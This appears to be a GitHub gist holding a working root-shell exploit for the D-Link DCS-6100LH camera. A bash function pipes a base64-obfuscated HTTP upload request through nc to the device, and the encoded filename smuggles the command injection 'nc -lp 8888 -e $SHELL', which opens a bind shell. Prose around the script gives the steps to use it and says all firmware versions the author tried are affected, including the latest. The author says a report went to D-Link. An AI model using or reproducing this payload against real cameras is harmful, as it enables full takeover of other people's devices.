Skip to content

Instantly share code, notes, and snippets.

@grocid

grocid/spl0it.md Secret

Created November 10, 2023 20:54
Show Gist options
  • Save grocid/becaff3b0c7bef3edcb5801b70b7af21 to your computer and use it in GitHub Desktop.
Save grocid/becaff3b0c7bef3edcb5801b70b7af21 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
spl0it.md

Gaining root shell on Dlink DCS-6100LH

Applies to HW Ver A1

#!/bin/bash

function pwn_thy_cam()
{
    echo UE9TVCAvZ29mb3JtL2Zvcm1VcGxvYWRGaWxlVGVzdCBIVFRQLzEuMQ0KSG9zdDogMTkyLjE2OC4wLjIwDQpDb250ZW50LUxlbmd0aDogMjg5DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTANClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENCk9yaWdpbjogaHR0cDovLzE5Mi4xNjguMC4yMA0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhOyBib3VuZGFyeT0tLS0tV2ViS2l0Rm9ybUJvdW5kYXJ5QUNKSmI0R1BXWUFFZEE3aQ0KDQotLS0tLS1XZWJLaXRGb3JtQm91bmRhcnlBQ0pKYjRHUFdZQUVkQTdpDQpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9ImZpbGV1cGxvYWQiOyBmaWxlbmFtZT0idGVzdCBgbmMgLWxwIDg4ODggLWUgJFNIRUxMYCINCg0KZ3JvY2lkAAANCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeUFDSkpiNEdQV1lBRWRBN2kNCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0idXBkYXRlIg0KDQp1cGRhdGUNCi0tLS0tLVdlYktpdEZvcm1Cb3VuZGFyeUFDSkpiNEdQV1lBRWRBN2ktLQ0KDQo= | base64 -d | nc 192.168.0.20 80 > /dev/null 2>&1 &
}

# Lets pwn it
echo "[ ] Setting up shell..."
pwn_thy_cam

# This is the bind shell
echo "Try out your shell by typing"
echo "nc 192.168.0.20 8888”

Put device in recovery mode, connect to camera wifi and run above code. This will spawn root shell. Applies to all firmware versions I have tried, including the latest 1.04.05 (3.5.23-b01).

Report has been submitted to Dlink. Please to do not distribute.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment